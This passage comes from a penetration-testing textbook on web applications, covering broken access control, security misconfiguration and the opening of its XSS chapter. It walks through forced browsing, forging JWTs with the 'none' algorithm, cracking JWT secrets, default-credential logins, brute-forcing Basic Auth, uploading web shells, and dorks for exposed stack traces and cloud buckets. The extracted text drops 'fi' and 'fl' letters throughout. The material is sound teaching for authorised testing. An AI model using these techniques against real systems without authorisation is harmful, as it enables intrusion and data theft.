as the limitations of Google in terms of what it is allowed to show/index. A
website administrator can direct web crawlers (like the Google and Bing bots)
to not index their website; this will eectively ensure zero or at most minimal
Google/Bing results for the target domain in most cases. In addition, Google
will not allow a signicant number of search requests using operators from
the same client in a short period of time without challenging the client with
a CAPTCHA. This is done in an eort to combat automated searches and
abuse of the Google search service and can signicantly hamper our eorts.
Even with these minor limitations we will still ultimately obtain a list of
potentially interesting le and folder paths worth investigating. The act of
browsing to les we should not have access to or otherwise not linked or pub-
licly known is called forced browsing and is nothing more complicated than
attempting to access various pages of a website with a browser or automated
tool. For example, if we use every popular search engine to search for exam-
ple.com none of the results will show the page example.com/sensitivepage.html
88 The Penetration Tester's Guide to Web Applications

even though it exists (in this hypothetical example). However, we can simply
open our browser and manually browse to that page and this is the concept
behind forced browsing, only with a bit more intelligence by using precon-
structed lists of popular/common page names and directory listing results
which may not otherwise be indexed by search engines. ZAP has a built-in
feature called Forced Browse which does just this; it used to be a standalone
tool called DirBuster but has since been incorporated into the core function-
ality of ZAP (Figure 6.8).

Figure 6.8 ZAP's force browsing option.

By selecting the target application we want to force browse, we can start the
tool and view the results which will show us available directories (or les as
the case may be); basically responses from the website which do not contain
a 404 response code. We do however, in most cases, want to tune the tool to
use a custom list or at least modify the default word list to include les and
folders we are already aware of from our reconnaissance, directory browsing
results, and previous engagements to be the most eective. Figure 6.9 shows
the results of a Forced Browse attack.
OWASP A5:2017 Broken Access Control 89

Figure 6.9 Initial results of forced browse.

The results of the forced browsing attack will often yield directories and pages
which should not be exposed externally, or are missing the appropriate access
controls respectively. As with the results from other tools, it is incumbent
upon us to manually verify the results and use them to further our goals of
gaining access to the target system.
Poorly congured web applications may expose elements responsible for
access control to the client in GET parameters, hidden form elds, cookies,
and other areas typically used to handle session state. In the case of pa-
rameters, these can be aptly named admin, role, userlevel or similarly with
an associated numerical value denoting the type of access/privilege. In cases
when such a parameter exists, we want to attempt to modify the value to see
if by changing the value we can modify our level of access. Figure 6.10 shows
an example of various parameters and values.

Figure 6.10 URI and applicable parameters.

In this example by changing admin=0 to admin=1 and resubmitting the


request we may be able to escalate our level of privilege to that of an ad-
ministrator. When this is possible, the root cause of the aw is a lack of
proper access control. Paying special attention to interesting parameters is
another recurring theme, the challenge can be discerning between interest-
ing and ordinary. Sometimes the interesting elements are evident and other
times practice, good note taking, research and above all fuzzing, are the best
methods to determine what an interesting element is in the context of our
target application. We can't always rely on version numbers or readily known
90 The Penetration Tester's Guide to Web Applications

information to guide our eorts but with the proper tools and mindset we
can succeed in identifying and exploiting elements associated with broken
access control and other aws for that matter.
Another common example of broken access control is centered around the
JSON Web Token (JWT) which is a stateless mechanism described in RFC
7519 used for authentication. A JWT can be thought of as a digitally-signed
container carrying identication information such as a username, level of per-
mission, associated claims, expiration time and so on. The JWT is comprised
of three parts: A header, payload, and signature, collectively constructed as a
variable length Base64 encoded string of characters separated by two periods.
This is shown in Figure 6.11.

Figure 6.11 Encoded JWT.

The string of characters preceding the rst period (the header) denote the
algorithm used to encrypt the payload (in some cases) and the token type
such as HS256 (HMAC with SHA256) and JWT respectively. The next string
of characters, between the two periods, is the payload. The nal string of
characters is the signature which is calculated using a secret key to encrypt
the values of the header and payload (once again in some cases, as JWT don't
have to be encrypted and can be instead digitally singed). Like many things
in cyber security, when implemented correctly a JWT does a good job for its
intended purpose, it's when the implementation is awed that we nd ways
to exploit it.
As it pertains to the security of JWT, two of the main things we want
to test are the strength of the secret key used for signing and weaknesses
in libraries blindly accepting none as the hashing algorithm. The example
application shown in Figure 6.12 uses JWT for authentication as we can
see from the HTTP response header sent to our browser after the initial
successful login request, depicted in Figure 6.13.
OWASP A5:2017 Broken Access Control 91

Figure 6.12 Login page for application.

Figure 6.13 Receiving JWT upon successful authentication.

From here we have access to the JWT of:


eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
eyJ1c2VybmFtZSI6Imd1ZXN0IiwibmFtZSI6Imd1ZXN0IiwicHJpdiI6NX0
-IeJzAnH8Mzc0yuv6_qInbqJ0M9fmZopm0EZt6s4IH0
the header and payload of which we can easily decode with Burp, Zap, or on
the Linux command line with base64 -d as seen in Figure 6.14.
92 The Penetration Tester's Guide to Web Applications

Figure 6.14 Decoding JWT with base64 command line utility.

With this information we can see the user authenticated as a guest with what
seems to be a privilege level of ve. At times there is sensitive information
in JWT that is important for us to identify as it may be useful for further
attacks. This token is signed which means while we can easily see what the
header and payloads contain, and even change these contents, if we do so
and resubmit the token, the server or API should reject our request based
on a signature mismatch stemming from our tampering. However, we can
attempt to simply change the algorithm from HS256 to none, remove the
signature, change guest to administrator and resubmit the token. This could
be accomplished with ZAP's encode/decode feature; see Figure 6.15 through
6.18 for details.

Figure 6.15 Using ZAP to initially decode a string.


OWASP A5:2017 Broken Access Control 93

Figure 6.16 Using ZAP to subsequently encode a modied string.

Figure 6.17 Using ZAP to manually submit a modied JWT.


94 The Penetration Tester's Guide to Web Applications

Figure 6.18 Evidence of access to the administrator's account.


An administrative level of access was granted because the endpoint accepted
the token with a modied header representing the algorithm as none coupled
with the modied payload claiming administrative access.
To attack weaknesses with the secret key, we focus our eorts on a dictio-
nary attack. John, as well as hashcat (which we used in earlier chapters), can
be compiled to support JWT cracking. When the JWT verication secret
is suciently weak or our cracking machine is suciently powerful, we can
obtain the original secret from the JWT (as seen in Figure 6.19). With an
exposed secret we can now sign our own tokens and grant our own access to
the target application.

Figure 6.19 Using John The Ripper to crack JWT.


OWASP A5:2017 Broken Access Control 95

Link to hands-on portion: https://tptgtwa.com/owasp5


Root Cause and Conclusion: JSON Web Tokens are not inherently in-
secure, and in fact, are quite handy for certain circumstances such as state-
less API authorization. Likewise, the exploitation of the other topics dis-
cussed in this chapter, as with the JWT example, stem from poor plan-
ning/implementation and a lack of oensive testing. Broken access control
comes in many forms due to myriad ways the complex task of implementing
authorization is often executed. It's challenging to write a secure, robust, and
user-friendly application, and as an attacker we want to make sure we are
doing our part to test for weaknesses in design.
Chapter 7

OWASP A6:2017 Security


Misconguration
Denition: Security misconguration is the most commonly seen issue. This
is commonly a result of insecure default congurations, incomplete or ad hoc
congurations, open cloud storage, miscongured HTTP headers, and ver-
bose error messages containing sensitive information. Not only must all oper-
ating systems, frameworks, libraries, and applications be securely congured,
but they must be patched and upgraded in a timely fashion.

Details: The topic of web application security miscongurations encom-


passes a broad scope of issues and includes aws in every part of the stack.
Some of the issues representative of this category have already been touched
on, such as default passwords and directory browsing, but the core of this
category focuses on poor baseline hardening.
One of the challenges (and subsequent reasons why ndings in this cate-
gory are prevalent on many penetration testing reports) with implementing a
consistent security baseline for new web applications is the propensity of mod-
ern web applications to be highly complex and disparate. Fifteen to twenty
years ago it was much more common to have IIS and MSSQL along with
.NET, an installed SSL certicate, and in essence the entire stack running on
one box. What we learned from this architecture is that it's not fault tolerant
(single points of failure), not capable of high volumes of trac, and it's not
feasible to patch without scheduling a maintenance window. These realities
gave way to loadbalancers sitting in front of web farms with dozens of web

97
98 The Penetration Tester's Guide to Web Applications

servers and database servers replicating to multiple datacenters, and this was
the status quo for over a decade; it's how we arrived at a point where we could
not only patch vulnerabilities, update certicates and manage/inspect trac
ow, but also upgrade our codebase in real-time without impact. This idea
of automating the maintenance and succession of dozens of moving parts all
of which are driven by software and version control, gave way to a devops ap-
proach of continuous integration, continuous delivery, and constant change to
the environment. While adoption of true devops is still not extremely preva-
lent in most larger companies, the underlying concepts of devops have taken
hold in many organizations, and as a result weekly sprints, regular change
advisory board (CAB) meetings and adoption of cloud services/platforms are
very common. This newer method of automating implementation, delivery,
testing, and so on sets heightened expectations on the quality of security,
and can also result in a complex system requiring constant attention to en-
sure stability, uidity, and adherence to business requirements. As a result
of the constant state of ux, establishing baseline hardening principals and
continuing to implement them becomes dicult to do if the process is not
constantly updated or elegantly automated.
Because of this and other competing priorities, it is often found that de-
fault settings are left unchanged, debugging is enabled on production systems,
unnecessary services are found to be running, and secure build documents are
not maintained on paper or followed in practice. Change management ticket
requests to allow rewall rules for a new server build in the DMZ are approved
because the business needs outweigh the security concerns and "scanning af-
ter the go-live will nd all the issues". Security professionals often see the
missteps of typical business operations, the corners cut and the aftermath
of doing so over an extended period of time, as the results are evident the
rst time we conduct a penetration test. If you are not privy to these real-
ities know that they happen every day due to an example scenario like the
one just mentioned or due to incompetence/ignorance or just poor business
practices. Malice is almost never a factor; humans want to do the right thing
most of the time, and in a for-prot business environment, keeping systems
online and ensuring continued revenue is the right thing to do.

Real-World Dialog: I teach several classes for the SANS institute and in
some of the discussions with students the topic of server hardening comes
up. We look at netcraft results and the adoption of security headers and
SSL/TLS congurations on varying websites and invariably the value of the
Server header (as seen in Figure 7.1) is brought up.
OWASP A6:2017 Security Misconguration 99

Figure 7.1 Response headers as seen from a browser's development tools.

Why divulge the real value for this header? Why tell everyone we are running
Apache with various modules compiled and their associated versions? Is there
any value in doing so, and is there any increase in security if we hide or alter
these values? These questions will almost always result in a spirited conversa-
tion about security through obscurity (just because we hide the value doesn't
mean any vulnerabilities associated with our version of software disappear...),
software popularity metrics (how else can we measure how prevalent Apache
is compared to others...), with me steering the conversation to if we believe
the value is accurate (or how we might verify its accuracy). In practice the
most I have seen done to the Server header value is hiding it or completely
removing it and I see this about 3% of the time. The other 97% of the time
the header is divulged, accurately portraying the underlying software being
used to serve the website. Why? Because 3% of the time a WAF hides this
header by default and the other 97% of the time absolutely no one with the
ability and level of access required to make this change has ever had so little
work to do that the task of "changing the default Server header" has risen to
the top of their priority list. Of course, I have not conrmed this but some-
thing tells me I am right. . . . Another thing that doesn't always get changed
are default passwords for commercial software.
During the internal portion of a network penetration test a colleague came
across an IBM WebSphere server, and in doing his due diligence (researching
and identifying potential default administrative passwords) was able to login
with administrative rights simply using the vendor documented default login
credentials. This was a production system hosting a multitude of websites
while running atop a Windows 2016 enterprise server. With administrative
rights we were able to deploy arbitrary war les, among other things, re-
sulting in a running instance of our custom code. With this functionality I
wrote a simple JSP page with an input box allowing for command execu-
tion/injection. Whatever command we submitted to the form was executed
on the Windows server with *system* privilege. An encoded MSF PowerSehll
100 The Penetration Tester's Guide to Web Applications

payload spawning an Empire agent ensued, as did our initial foothold into
the network.
A common fallacy I had before I gained experience at various companies
was that larger organizations were more secure than smaller ones. My thought
process was based on the notion that a large company has lots of money, and
therefore has more security sta and the latest or best technology across the
enterprise. If the company didn't have the best technology and the smartest
people maintaining the infrastructure, then surely, they would not remain
on the cutting edge for long, and their role as a protable leader in their
industry would diminish over time. That was my logic and needless to say it
was signicantly awed. What I learned is embodied in the bulk of this "Real
World Dialog" section of this chapter. Complexity breeds insecurity and the
more technology, the more stu a company has, the harder it is to keep track
of everything. With that let's turn our attention to how to exploit security
miscongurations.

How to Exploit: To know if something is insecurely congured we have


to have an indicator, and to make that determination or otherwise identify
the indicator there is no substitute for research and due diligence as we saw
in the last example. As penetration testers we will come across a plethora
of commercial software, the majority of it complete with a web interface or
API. When presented with this interface we want to initially focus on two pri-
mary things as it relates to the identication of Security Miscongurations:
checking for default credentials and identifying the software versions in use
to check for known/published vulnerabilities. Recall that the entire stack is
typically in-scope during a web application penetration test, and this encom-
passes everything from the OS through to the web server, framework, custom
code, content management system, plugins, TLS implementation, databases,
perhaps any running service discovered on the target machine. If, upon us
accessing the web interface with our browser, we are presented with, or can
navigate to a login page, we want to take note of the name of the software
(usually this appears directly on the home page or in the HTML title or
source code or there are clues in the HTTP response headers) being used to
serve the page. In addition, we want to identify the software all the way up
the stack, we also want to make note of the version of commercial software
we are interfacing with. As we can see in Figure 7.2, the commercial software
is clearly running Enterprise Splunk.
OWASP A6:2017 Security Misconguration 101

Figure 7.2 Commercial software with web front-end.

Upon closer examination we can narrow down which version of Splunk is


used by reviewing the HTML source code, paying attention to JavaScript
references, and eventually coming across a link to the help section. This
will ultimately redirect to the Splunk website, but not before divulging the
current version of Splunk (version 7.0.1 as seen in Figure 7.3):

Figure 7.3 The identied version number.

With this information the next step is to search for known default creden-
tials and known vulnerabilities; useful resources to aid in this step are CIRT
(cirt.net/passwords) and the CVE list (cve.mitre.org) respectively. A quick
search through CIRT for Splunk passwords shows only one set of credentials
as seen in Figure 7.4.
102 The Penetration Tester's Guide to Web Applications

Figure 7.4 CIRT's single default password for Splunk.

A search on the CVE list shows our version of Splunk as being vulnerable to
CVE-2018-11409, and contains a link to the exploit database where author
"KoF2002" has contributed a PoC (proof of concept) attack string as we can
see in Figure 7.5.

Figure 7.5 Proof of concept code for an information disclosure vulnerability.

At this point we logically want to try and login with the default credentials
and attempt to exploit the information disclosure vulnerability.
Websites don't just run on port 80 and port 443, and though the target
of our testing may be the primary web interface, we need to be cognizant
of additional services listening on the target host. The most ecient way to
identify additional running services is by using nmap. This tool can quickly
OWASP A6:2017 Security Misconguration 103

determine which ports are open, and can probe to determine which service is
running. Beyond basic port scanning however, nmap comes with a series of
built-in scripts as part of the NSE (nmap scripting engine) which we can use
to identify vulnerabilities in some cases, and further expose information about
the target system. Basic invocation of the tool will help identify listening
services by scanning, as a default setting, the most popular/common 1000
ports on a target system. Figure 7.6 shows the results of such a scan.

Figure 7.6 Results of nmap being executed without any arguments/parameters.

The ports identied as open have the associated service description displayed
as part of the output, but to ensure nmap is actually probing to determine
the true listening service and its version, we want to specify the -sV option
as part of our command. Doing so may change a previously unknown result
to a description of the actual service running on the given port as well as
the identied version. It's also prudent to enable OS detection as a matter of
course in most situations, and run some basic NSE scripts as well as a trace
route for thoroughness. Nmap provides the "-A" option to do all of this in
one command; that is, what would normally be a command consisting of,
"nmap -sV -O traceroute script=default" can now be executed as "nmap -
A" with the intended target(s) indicated as part of the command. The results
are visible in Figure 7.7.
104 The Penetration Tester's Guide to Web Applications

Figure 7.7 nmap being invoked with "-A".

The identied software version can matter signicantly as certain versions


of software are known to be susceptible to various vulnerabilities. Since
nmap is designed as a network mapping tool, it does a great job at nd-
ing open ports and associated services, but at layer seven, the application,
the best tool available for identifying version information is our browser and
accompanying plugins. Before we discuss that in more detail let's quickly
look at the additional HTTP specic scripts we can execute in conjunction
OWASP A6:2017 Security Misconguration 105

with a typical nmap scan. From a UNIX-based system the command, "ls
/usr/share/nmap/scripts/*http* | wc -l" yields a result of over 130 HTTP
scripts (a snippet of which is shown in Figure 7.8) ranging from a joomla-
brute force utility to a form fuzzer, and over one dozen CVE vulnerability
checks (akin to a vulnerability scanner).

Figure 7.8 Snippet of NSE scripts pertaining to HTTP.

We invoke a given script with the, "script=nameofscript" syntax and can


debug with he -d ag when a script does not work as expected. NSE scripts
are written in LUA and are human readable (complete with notes in most
cases); it is highly advisable to read at least the description of each script we
intend to launch prior to using it, especially in a production environment.
It is not uncommon for certain scripts to be regarded as dangerous; they
can result in negative consequences (locking out accounts, rendering services
unstable, and so forth).
Where nmap leaves o, our browser and applicable extensions take over
in terms of being able to identify software components and versions at layer
seven. Browser extensions, or addons, are additional software components
we can choose to install in our browser to extend its base functionality  we
can basically use extensions to customize our browser to meet our needs as
penetration testers. All modern browsers have built-in developer tools which
are, by most accounts, quite capable from a web developer's perspective but
from an oensive security perspective we typically have dierent needs and
therefore benet from dierent tools. Microsoft's Edge browser currently has
support for over 220 extensions (from categories such as shopping, social, de-
velopment and so on), whereas Google's Chrome browser as well as Firefox
have extensions numbering well over 10,000 (Safari and Opera have exten-
sions as well). In addition to a proxy switcher (to easily switch between ZAP
106 The Penetration Tester's Guide to Web Applications

and Burp and None for example), some useful extensions might include a
utility to identify the IP address of the current domain we are browsing to,
tamper data, user-agent switcher, web developer, and the like. In addition,
we can glean a signicant amount of information about a target web appli-
cation and the technology it uses by using the wappalyzer extension which
is shown in Figure 7.9.

Figure 7.9 Wappalyzer output as seen when viewing from within browser.

Similar to mobile app permissions, we have the ability to see what information
an extension will require to operate prior to installing it, and we want to be
careful because the extension is executing in our browser. As we submit
sensitive content, the extension has the ability to access this information.
Unless we are vetting each extension manually or writing our own, we have
to rely on the community and our level of trust with the developer/team
responsible for writing the extension. Of course, the same could be said of
our browser and OS for that matter. It can be interesting to see how ckle
any conglomerate of software actually is the deeper we understand the inner
workings and trust relationships. With our current level of potential security
misconguration understanding, let's shift our focus to exploitation.

Examples: A development environment is the appropriate place for the de-


velopment team to make changes to code, test, and implement functionality
and utilize verbose error messages to help debug problems. This concept of
OWASP A6:2017 Security Misconguration 107

debugging is common across any development environment; as code is writ-


ten, bugs are introduced and without addressing these bugs the code won't
work properly in many cases. The webserver (IIS/Apache/Nginx) has logging
capabilities which can scale up or down to provide more verbose messages
just as the framework used to write the code typically has the capacity to
log. In addition, the actual code written by the development team is com-
plete with comments and can contain logic to log errors and other messages
when certain conditions are met. In contrast to a development environment,
a production environment is not the place to allow error messages to be
sent to the user. In fact, when error messages (and similar messages) are
enabled in a production environment this can often lead to an information
disclosure vulnerability, which at its root, stems from a security miscong-
uration aw. Stack traces, for instance, are a great way for an attacker to
learn more about the underlying software, its path of execution, local user ac-
counts on the system, conrm the OS supporting the application, and more.
What we as attackers need to do to make use of this information is to rst
trigger an error, an unhandled exception, which will in turn cause the appli-
cation to expose the error message. We can do this with fuzzing (XSS and
injection attacks on IIS servers work great), with the help of Open Source
Intelligence (OSINT) such as Google dorks, as well as interacting with the
application in a manner not accounted for by the developers  attacking
session state, concurrency/business logic, and in some cases the underlying
web server technology. A Google dork identifying such an error would be,
'intext:"an unhandled exception was generated" -stackoverow.com ext:asp
"source error:" "stack trace:" ' and of course narrowing it down to our target
web application(s) with the 'site:' directive will ensure we are only looking
for issues with in-scope target systems. The results of running such a query
are shown in Figure 7.10.
108 The Penetration Tester's Guide to Web Applications

Figure 7.10 Identied stack trace.

With the output of this stack trace we can hone in on the software version
information and parlay this knowledge to conduct a search for CVEs. This
is usually the quickest way to exploitation, and while there are many tens of
thousands of vulnerabilities being identied every year, nding a matching
vulnerability specic to our target software with an accompanying and work-
ing exploit is rare. What we come across more often is a reference to a CVE
for a version of software with little to no detailed information about the aw
and no exploit code. As we saw in the Splunk example earlier, some exploits
are rather basic and consist of nothing more than a specially crafted GET
OWASP A6:2017 Security Misconguration 109

request. However, many other public exploits require very specic conditions
to work, and can be time-consuming to debug when they fail. With that be-
ing said, exploit development is certainly a skill which will serve us well as we
can't always rely on a known exploit being available and reliable. Turning our
attention back to cstat identied in the stack trace, we can try to do some
research about the technology, but a quick web search returns something
similar (however nothing exactly referencing this software). Turning to nmap
with a command of "nmap -p 1-65535 -A -oA cstatServer 10.90.14.27" will
scan all ports with the benets of the "-A" previously mentioned while out-
putting results to three dierent formats (XML, greppable, and the default)
with a base output lename of "statServer". This is useful as greppable out-
put is easy to search whereas the default nmap output is much more detailed.
Finally, the XML output is very verbose and actually contains signicantly
more information than even the default nmap format output. An example of
default nmap output is shown in Figure 7.11.

Figure 7.11 nmap output showing cstat running on multiple ports.

The results of the nmap scan show a high port listening with an identied
service called cstat and corresponding version of "0.22". Browsing to this
port (as shown in Figure 7.12) shows the administrative interface for what
appears to be the CMS (content management system) for the web application
running on the default ports of 80 and 443 on the same server.
110 The Penetration Tester's Guide to Web Applications

Figure 7.12 Administrative interface and login.

Since this seems to be unpopular or proprietary/homegrown software (based


on the lack of search engine results), known default credentials and vulnera-
bilities are not going to be published. However, we can proceed to try common
credentials manually or launch an automated credential stung attack: look-
ing back at the stack trace (depicted in Figure 7.13) reveals a username which
will be useful for this purpose.

Figure 7.13 Username divulged in stack trace.

Submitting the username identied in the stack trace results in a 401 HTTP
response and prompts for a Basic Authentication dialog box in our browser.
Another security misconguration, Basic Authentication has no concept of
account lockout.... The exposed username is valid and was congured with a
weak password which we were able to guess with just under 10,000 requests.
A bash oneliner helped to concatenate the "jsmith" username with a list of
common passwords as we can see in Figure 7.14 whereas Figure 7.15 shows
the utilization of the encoded payload.
OWASP A6:2017 Security Misconguration 111

Figure 7.14 Bash script producing base64 encoded payloads.

Figure 7.15 Conguring ZAP to use payloads.

ZAP's fuzzer was easily setup to use this list of precongured base64 encoded
credentials and we can see looking at the results that one request resulted in
a 200 response code (our indicator of success which is visible in Figure 7.16).
Figure 7.17 shows the result of gaining administrative access upon sucessful
expolitation.
112 The Penetration Tester's Guide to Web Applications

Figure 7.16 ZAP's success in identifying credentials.

Figure 7.17 Administrative interface of CMS.

With administrative access to the CMS we have the ability to create new
pages, moderate content, change permissions, impersonate (as well as create
and delete) users, and so on. A straightforward method of gaining shell access
in this case is to upload a shell (via the convenient content management
feature of the CMS) and then access it from our browser. A collection of
ASP web shells exist online, and the minimal code shown in Figure 7.18 will
provide a HTML form where we can submit commands (Figure 8.19) to the
back-end OS. The results of a successful attack are shown in Figure 7.20.
OWASP A6:2017 Security Misconguration 113

Figure 7.18 ASP web shell's code.

Figure 7.19 ASP web shell web interface.


114 The Penetration Tester's Guide to Web Applications

Figure 7.20 Results of submitting the command.

An additional security misconuration commonplace today is openly permis-


sive cloud storage permissions. Exploiting this is similar to exploiting direc-
tory browsing, and in fact the process and concept are very similar. Our rst
task is identifying the aw; once we nd a public storage container, we simply
browse through it to identify sensitive or otherwise useful information. Just
as there are Google Dorks for directory browsing, there are Google Dorks
to help identify the existence of cloud storage containers. Amazon's Simple
Storage Service (S3), Azure's blob storage, and Google's cloud storage all
provide users with a way to save/serve static content, and each has a unique
URL we can leverage to conduct our reconnaissance. An applicable point of
reference for each would be:

https://nameofbucket.storage.googleapis.com/nameofobjectinbucket
https://storage.googleapis.com/nameofbucket/nameofobjectinbucket
https://s3.amazon.com/nameofbucket/nameofobjectinbucket
https://nameofbucket.s3.amazon.com/nameofobjectinbucket
https://nameofbucket.blob.core.windows.net/nameofobjectinbucket

In addition there may be a full path required to specify the location of the
name of the object in the bucket. The content in the storage container is very
much meant to be accessible by someone or some process hence the familiar
OWASP A6:2017 Security Misconguration 115

URL format  to access a bucket all we need to know is the name of the
bucket. To identify the bucket name we want to hone in on, we can turn back
to our search engine of choice and conduct a search with the site: directive to
narrow down the results. For example, a query of, "site:blob.core.windows.net
'nameoftarget'" should help and of course additional operators to search for
specic document types and keywords will further lter the results to exactly
what we are looking for as is evident in Figure 7.21.

Figure 7.21 Redacted results of search query.

Finding evidence of cloud storage containers and having condence that the
identied container and the contents in the container are public (we can
set granular permissions on not just the folder/directory/bucket but also
the les/resources within the bucket) takes a bit more eort. While manual
eorts are convenient for quickly checking for the existence of the storage
containers in a one-o situation, we want to automate this process as our
target list grows. While we could create our own solution to handle the pro-
cess of identifying cloud storage containers for the three major cloud service
providers, the tools to do this already exist. Years ago, a fellow security pro-
fessional released a Ruby script "bucket_nder.rb" to automate this process
for S3 buckets; it requires a wordlist (applicable names of buckets to search
for) and supports the ability to download the publicly available les along
with logging. This is shown in Figure 7.22.
116 The Penetration Tester's Guide to Web Applications

Figure 7.22 Redacted results of bucket_nder output.


Another option to help with this endeavor are two Burp extensions, AWS
Security Checks, and Cloud Storage Tester which do what their respective
names imply. A more thorough tool for this example however is Espial as
it supports S3 buckets, Azure blobs, and Google's cloud storage implemen-
tation. With Espial we need to provide the input of what our target envi-
ronment is comprised of, such as domain names and IP addresses/keywords.
With this input Espial will execute a multitude of OSINT activities and pro-
vide us with the results of its ndings including public cloud storage avail-
ability. Figure 7.23 shows Espial's cloud storage bucket information.

Figure 7.23 Selected results of Espial output.


With these results (from either tool) we still need to manually review what
was downloaded to see if it is sensitive or presents a risk to the organization
we are testing. By default cloud storage containers/buckets are not open and
in fact, have to explicitly be congured to allow access. The cloud service
customer is responsible for securing their own assets so when we nd this type
of issue it's another example of a security misconfgiuartion we can exploit.

Link to hands-on portion: https://tptgtwa.com/owasp6


Root Cause and Conclusion: The cloud service provider is responsible for
security of the cloud while the client of the service if responsible for security
in the cloud. This concept goes much past insecure permissions on storage
OWASP A6:2017 Security Misconguration 117

containers, additional examples of which we'll explore later. There are many
ways to incorrectly congure a web server, cloud service, codebase, and as
penetration testers we need to be well versed in knowing what to look for,
knowing how to identify a given aw, and how we can use the vulnerability
to gain further access to the system. This chapter claried that the target
scope of the penetration test can vary signicantly based on the expectations,
business, and rules of engagement. Typically, the root cause of security mis-
congurations stem from human oversight or poor planning/implementation.
Staying up to date with the latest technology is challenging, and it's not un-
common for distinct teams in an organization to move quickly in adopting a
new solution to a current problem. The diculty securing a given solution
stems from limitations in our knowledge, the infancy of the chosen technol-
ogy, the lack of documentation, employee turnover and the accumulation of
technical debt. All of these things, with the addition of time, make it very
hard to secure an environment and subsequently provides opportunities for
us to succeed in our endeavors.
Chapter 8

OWASP A7:2017 Cross-Site


Scripting (XSS)
Denition: XSS aws occur whenever an application includes untrusted
data in a new web page without proper validation or escaping, or updates
an existing web page with user-supplied data using a browser API that can
create HTML or JavaScript. XSS allows attackers to execute scripts in the
victim's browser which can hijack user sessions, deface web sites, or redirect
the user to malicious sites.

Details: At its core, XSS is an attack targeting users of an application, and


a largely misunderstood vulnerability. Note XSS being described as both
an attack and a vulnerability  this reality adds to the confusion so let's
break it down. XSS is a vulnerability which when exploited, will cause harm
to the client (user) of a web application. Three components are required
for a typical XSS attack: A vulnerable web application, an attacker, and a
victim (user). The vulnerable web application must exhibit the aw whereas
the attacker has to nd the aw, craft an attack, and the victim has to be
exposed to the attack. XSS comes in two forms, Server and Client, with
overlapping types such as stored, reected, and variations on DOM-based
XSS. Finding an XSS vulnerability is not dicult to do; weaponizing the
attack to cause meaningful damage is harder and nally crafting a suitable
payload and successfully attacking a victim can be challenging. The latter is
accurate because during a professional penetration testing engagement it is

119
120 The Penetration Tester's Guide to Web Applications

rare that the client/business will allow us to target users of their production
application.
The root cause of an XSS vulnerability resides at the web application
layer, typically the code-base; unsanitized user input is not adequately en-
coded prior to being sent to a user or being executed in the DOM. This means
we can submit a malicious payload (almost always JavaScript; other script-
ing languages will also work) to the application, and in turn this payload
is parsed/stored or otherwise accepted by the application and subsequently
returned to the victim. If this happens immediately (as an HTTP response to
our HTTP request), this would be an example of reected XSS. If the payload
is executed later, when we navigate to a specic portion of the application,
this would be stored XSS. In the event the XSS attack never gets sent to the
server (by utilizing the # character in the URL for example) or otherwise
is delivered and resides strictly in the DOM, this would be an example of
DOM-based XSS.
A stored XSS vulnerability allows us to use the persistent storage of the
application (typically the back-end database) to host our malicious payload
while the web server conveniently serves our attack to users of the application.
This type of aw can be devastating as everyone visiting the compromised
web application will be served our malicious JavaScript from the origin of
the vulnerable host. To be clear, we can submit malicious scripts which will
subsequently be sent from the server to the client, and execute in the client's
browser. The same origin policy (SOP) is not being bypassed as the source
of the script (from the perspective of the browser) is the vulnerable host.
This means our malicious script will run in the victim's browser and be
able to access the DOM and other resources just as a legitimate/benign
script could. The potency of this type of attack is signicant as JavaScript
is a powerful programming language, and thus, when we launch a successful
attack, we have a lot of control over what occurs in the context of the client's
experience, session, and interactions with the vulnerable web application and
their browser. We have to think about browser plugins, browser password
storage, social engineering attacks, and more as JavaScript executing in a
browser has access to the entirety of the technology exposed by the API; yet
another reason why attacking clients is not typically in-scope.
Reected XSS is not persistent and is typically delivered via a link to the
victim, which will in turn be submitted to the vulnerable application as a
GET request. This means the attack is a one-time event (or as many times as
the link is clicked). In this situation we would nd a vulnerable GET param-
eter, craft an attack and share the entire URI, complete with the malicious
OWASP A7:2017 Cross-Site Scripting (XSS) 121

JavaScript, to the victim and hope the bait is taken. The ensuing attack
would only execute when the victim clicks the link and submits the GET
request, and the malicious script is sent back to the victim's browser with
the HTTP response. However, we would have to target individual victims
and have them directly interact with our attack string, so this is not always
a viable path to exploitation. A DOM-based XSS vulnerability can be stored
or reected.
Sometimes it can be hard to clearly explain XSS to a typical business
leader; in addition, it can be challenging to convey the risk of XSS. To aid
in these eorts, we need to nd a path to exploitation which adequately
portrays the risk of the nding. To do this we have to conduct research
into the extent of the vulnerability, and test the payload on ourself rst, to
tweak it to perfection. As with previously discussed vulnerabilities, there are
limitations to XSS attacks in terms of the impact they will have and our
ability to successfully launch the attack. Recall there are three components
to XSS (the application, our attack/payload, and the victim), each of which
has the potential to reduce our eectiveness; for instance, if our payload is
poorly tested, or the attack vector is minimal or the client simply has script
execution disabled in her browser. Even with these limitations we can still
oftentimes launch a serious attack with real consequences to the victim. And
let's be clear  the user is the victim of the attack, not the application (at
least not directly). It is the victim which has the browser which executes our
code  the application is merely the conduit for our payload initially.
XSS is the second most common nding in the OWASP top ten list, but
it's not the second most impactful due to the limitations already touched on.
A common attack scenario for XSS is to hijack a user's session by obtaining
the session token and sending it to the attacker. Another common attack
with XSS is to alter the contents of the page, modify form actions, enable
keystroke logging, or otherwise attempt to gain access to sensitive informa-
tion. Yet another very important XSS attack is to obtain XSRF tokens to
bypass security controls. As with any other vulnerability identied during a
penetration test, the risk rating associated with XSS must always be taken
in context: How sensitive is the application and what is the level of impact
associated with our successful exploitation?
Being such a common vulnerability, there are a multitude of tools designed
specically to identify XSS. However, the complexity of JavaScript (especially
minied and purposefully obfuscated, as seen in Figure 8.1) makes the task
of reading it, let alone comprehending it, challenging for some vulnerability
scanning tools and can lead to false negatives.
122 The Penetration Tester's Guide to Web Applications

Figure 8.1 Minied and obfuscated JavaScript.

There are however multiple tools that can reliably nd many XSS vulner-
abilities, such as our interception proxies and commercial web application
vulnerability scanning tools when congured properly. We'll discuss several
of these tools and applicable attack scenarios later in this chapter.

Real-World Dialog: I was introduced to the Browser Exploitation Frame-


work (BeEF) many years ago, and have since been able to use it during several
web application penetration tests. During one particular test I crafted a pay-
load to launch BeEF and promptly hooked several victims. The vulnerable
web application had the HTTPOnly ag set on session cookies so an out-
right session hijack via cookie theft was not likely. In reviewing the various
plugins at my disposal within the BeEF GUI I noticed a particular option
for dumping stored credentials. Executing this module enabled me to gather
